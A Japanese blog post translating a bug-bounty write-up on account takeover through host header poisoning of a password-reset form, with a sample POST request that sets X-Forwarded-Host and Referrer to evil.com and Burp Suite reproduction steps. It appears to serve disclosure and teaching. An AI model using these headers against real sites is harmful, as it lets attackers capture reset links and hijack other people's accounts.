Shikata Ga Nai

Private? There is no such things.

ATO via Host Header Poisoningを訳してみた

Hello there, ('ω')ノ

 

ホストヘッダポイズニングによるアカウント乗っ取りを。

 

脆弱性:

 ホストヘッダインジェクション

 アカウントの乗っ取り

 パスワード リセットの脆弱性

 

記事:

 https://sechunter.medium.com/ato-via-host-header-poisoning-dc5c29d2fd0d

 

今回は、ホスト ヘッダ ポイズニングによるアカウント乗っ取りに関するもので。

Redacted.com はホスト ヘッダ インジェクションに対して脆弱であり。

リモートの攻撃者がこれを悪用して redacted.com のアカウントを。

乗っ取ることができて。


攻撃シナリオ:

攻撃者として、POST リクエストを変更することに。

最初に Host ヘッダの値を Evil.com に変更しましたが、何も起こらず。

次に X-Forwarded-Host ヘッダに Evil.com の値を追加しましたが、再び何も起こらず。

今回は Referrer ヘッダの値も変更し、X-Forwarded-Host ヘッダの値と同じ値を。

設定したところ、うまくいって。

リクエストは次のようになり。

 

 POST /forgot HTTP/1.1
 Host: redacted.com
 X-Forwarded-Host: evil.com
 Referrer: https://evil.com

    username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e

 

 

リクエストを送信した後、evil.com が次のようなホストのメールを受け取って。

 


再現手順:

1.「 https://redacted.com/forgot」に移動して。

 

2.次にユーザ名を入力し、Burp Suite を使用して。

 そのリクエストをインターセプトして。

 

3.次の 2 つのヘッダを POST リクエストに追加して。

 X-Forwarded-Host: evil.com
    Referrer: https://evil.com

 

4. そのリクエストを転送し、ユーザ名にリンクされているメールを確認して。

 

Best regards, (^^ゞ